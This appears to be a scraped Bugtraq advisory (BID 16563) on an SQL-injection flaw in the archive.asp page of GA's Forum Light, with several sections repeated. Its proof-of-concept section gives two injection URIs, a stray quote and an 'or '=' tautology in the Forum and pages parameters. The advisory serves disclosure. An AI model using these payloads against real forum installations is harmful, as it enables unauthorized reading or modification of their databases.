GA's Forum Light Archive.ASP SQL Injection Vulnerability
BID:16563
Info
GA's Forum Light Archive.ASP SQL Injection Vulnerability
| Bugtraq ID: | 16563 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 07 2006 12:00AM |
| Updated: | Feb 09 2006 05:58PM |
| Credit: | Dj_Eyes From Crouz Security Team is credited with the discovery of this vulnerability. |
| Vulnerable: |
GASoft GA's Forum Light 0 |
| Not Vulnerable: | |
Discussion
GA's Forum Light Archive.ASP SQL Injection Vulnerability
GA's Forum Light is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
GA's Forum Light is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
GA's Forum Light Archive.ASP SQL Injection Vulnerability
An exploit is not required.
The following proof-of-concept URI are available:
http://www.example.com/forum/archive.asp?Forum=Test+Forum%5F1%2D13%2D2004%5F11%2D28%2D2004&pages='
http://www.example.com/forum/archive.asp?Forum='%20or%20'='%5F1%2D13%2D2004%5F11%2D28%2D2004&pages=4
An exploit is not required.
The following proof-of-concept URI are available:
http://www.example.com/forum/archive.asp?Forum=Test+Forum%5F1%2D13%2D2004%5F11%2D28%2D2004&pages='
http://www.example.com/forum/archive.asp?Forum='%20or%20'='%5F1%2D13%2D2004%5F11%2D28%2D2004&pages=4
Solution / Fix
GA's Forum Light Archive.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].
References
GA's Forum Light Archive.ASP SQL Injection Vulnerability
References:
References:
- GA's Forum Light Homepage (GASoft)